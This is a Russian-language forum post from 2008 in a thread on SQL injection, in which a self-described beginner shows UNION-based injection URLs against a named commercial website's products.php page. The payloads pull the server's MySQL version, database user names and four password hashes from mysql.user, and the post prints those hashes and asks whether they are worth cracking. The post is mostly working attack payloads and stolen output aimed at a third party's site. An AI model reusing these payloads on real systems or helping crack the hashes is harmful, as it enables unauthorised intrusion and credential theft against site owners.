Тема: SQL Инъекции
Показать сообщение отдельно

  #8  
Старый 05.06.2008, 00:40
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами: 9450895

Репутация: 41
По умолчанию
sql иньекциях не силен по этому и хочу разобраться чё к чему

www.rayner.com

Поехали)
http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysq l.user/*
5.0.32-Debian_7etch1-log

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.use r/*
Даёт user их 5.

http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql .user/*
а по такому запросу пишет как я по нимаю пароли в зашифровки mb5.

*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
*8050739003BBDB60551FA99B5FFF34957C4F5F49


Тек ли это и стоит ли тратить време на их расшифровку???
 
Ответить с цитированием